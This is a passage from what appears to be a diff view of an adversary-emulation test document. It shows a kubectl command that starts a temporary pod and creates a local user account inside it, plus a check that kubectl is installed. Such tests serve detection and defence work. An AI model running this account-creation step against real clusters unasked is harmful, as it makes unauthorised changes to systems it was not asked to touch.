kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: kubectl must be installed and configured
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
which kubectl
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
echo "kubectl must be installed manually"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user